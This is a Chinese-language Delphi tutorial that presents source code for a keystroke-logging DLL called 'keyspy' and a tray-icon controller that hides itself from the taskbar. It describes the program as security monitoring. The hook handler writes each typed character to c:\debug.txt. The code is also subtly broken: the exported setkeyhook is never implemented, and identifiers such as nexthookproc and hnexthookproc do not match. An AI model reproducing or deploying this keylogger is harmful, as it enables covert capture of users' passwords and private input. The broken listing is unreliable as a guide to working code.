在許多系統(tǒng)中,出于安全或其它原因,常常要求隨時對鍵盤進行監(jiān)控,一個專業(yè)的監(jiān)控程序必須具備兩點,一是實時;二是作為指示圖標運行。實際應用中把利用Hook(即鉤子)技術編寫的應用程序添加到Windows的任務欄的指示區(qū)中就能夠很好的達到這個目的。我在參考了API幫助文檔基礎上,根據在Delphi開發(fā)環(huán)境中的具體實現分別對這兩部分進行詳細論述。
一、Hook(鉤子)的實現:
---- Hook是應用程序在Microsoft Windows 消息處理過程中設置的用來監(jiān)控消息流并且處理系統(tǒng)中尚未到達目的窗口的某一類型消息過程的機制。如果Hook過程在應用程序中實現,若應用程序不是當前窗口時,該Hook就不起作用;如果Hook在DLL中實現,程序在運行中動態(tài)調用它,它能實時對系統(tǒng)進行監(jiān)控。根據需要,我們采用的是在DLL中實現Hook的方式。
---- 1.新建一個導出兩個函數的DLL文件,在hookproc.pas中定義了鉤子具體實現過程。代碼如下:
library keyspy; uses windows, messages, hookproc in 'hookproc.pas';
exports setkeyhook, endkeyhook; begin nexthookproc:=0;
procsaveexit:=exitproc; exitproc:=@keyhookexit; end. 2.在Hookproc.pas中實現了鉤子具體過程:
unit hookproc; interface uses Windows, Messages, SysUtils, Controls,
StdCtrls; var nexthookproc:hhook; procsaveexit:pointer; function
keyboardhook(icode:integer;wparam:wparam;
lparam:lparam):lresult;stdcall;export; function setkeyhook:bool;export;//加載鉤子
function endkeyhook:bool;export;//卸載鉤子 procedure keyhookexit;far;
const afilename='c:\debug.txt';//將鍵盤輸入動作寫入文件中 var
debugfile:textfile; implementation function
keyboardhookhandler(icode:integer;wparam:wparam;
lparam:lparam):lresult;stdcall;export; begin if icode<0 then begin
result:=callnexthookex(hnexthookproc,icode,wparam,lparam); exit; end;
assignfile(debugfile,afilename); append(debugfile); if
getkeystate(vk_return)<0 then begin writeln(debugfile,'');
write(debugfile,char(wparam)); end else write(debugfile,char(wparam));
closefile(debugfile); result:=0; end; function endkeyhook:bool;export;
begin if nexthookproc<>0 then begin
unhookwindowshookex(nexthookproc); nexthookproc:=0; messagebeep(0); end;
result:=hnexthookproc=0; end; procedure keyhookexit;far; begin if
nexthookproc<>0 then endkeyhook; exitproc:=procsaveexit; end; end.
---- 二、Win95/98使用任務欄右方指示區(qū)來顯示應用程序或工具圖標對指示區(qū)圖標的操作涉及了一個API函數Shell_NotifyIcon,它有兩個參數,一個是指向TnotifyIconData結構的指針,另一個是要添加、刪除、改動圖標的標志。通過該函函數將應用程序的圖標添加到指示區(qū)中,使其作為圖標運行,增加專業(yè)特色。當程序起動后,用鼠標右鍵點擊圖標,則彈出一個菜單,可選擇sethook或endhook。
unit kb; interface uses Windows, Messages, SysUtils, Classes, Graphics,
Controls, Forms, Dialogs, StdCtrls, Menus,shellapi; const icon_id=1;
MI_iconevent=wm_user+1;//定義一個用戶消息 type TForm1 =
class(Tform) PopupMenu1: TPopupMenu; sethook1: TMenuItem; endhook1:
TMenuItem; N1: TMenuItem; About1: TMenuItem; Close1: TMenuItem; Gettext1:
TMenuItem; procedure FormCreate(Sender: Tobject); procedure
sethook1Click(Sender: Tobject); procedure endhook1Click(Sender: Tobject);
procedure FormDestroy(Sender: Tobject); procedure Close1Click(Sender:
Tobject); private { Private declarations } nid:tnotifyicondata;
normalicon:ticon; public { Public declarations } procedure icontray(var
msg:tmessage); message mi_iconevent; end; var Form1: TForm1;
implementation {$R *.DFM} function setkeyhook:bool;external 'keyspy.dll';
function endkeyhook:bool;external 'keyspy.dll'; procedure
tform1.icontray(var msg:tmessage); var pt:tpoint; begin if
msg.lparam=wm_lbuttondown then sethook1click(self); if
msg.Lparam=wm_rbuttondown then begin getcursorpos(pt);
setforegroundwindow(handle); popupmenu1.popup(pt.x,pt.y); end; end;
procedure TForm1.FormCreate(Sender: Tobject); begin
normalicon:=ticon.create; application.title:=caption;
nid.cbsize:=sizeof(nid); nid.wnd:=handle; nid.uid:=icon_id;
nid.uflags:=nif_icon or nif_message or nif_tip;
nid.ucallbackmessage:=mi_iconevent; nid.hIcon :=normalicon.handle;
strcopy(nid.sztip,pchar(caption)); nid.uFlags:=nif_message or nif_icon or
nif_tip; shell_notifyicon(nim_add,@nid); SetWindowLong(Application.Handle,
GWL_EXSTYLE,WS_EX_TOOLWINDOW); end; procedure TForm1.sethook1Click(Sender:
Tobject); begin setkeyhook; end; procedure TForm1.endhook1Click(Sender:
Tobject); begin endkeyhook; end; procedure TForm1.FormDestroy(Sender:
Tobject); begin nid.uFlags :=0; shell_notifyicon(nim_delete,@nid); end;
procedure TForm1.Close1Click(Sender: Tobject); begin
application.terminate; end;
---- 該程序雖然只用了幾個shellai函數,但是它涉及到了在Delphi中對DLL的引用、鉤子實現、對指示區(qū)的操作、用戶定義消息的處理、文件的讀寫等比較重要的內容,我相信這篇文章能對許多Delphi的初學者有所幫助。
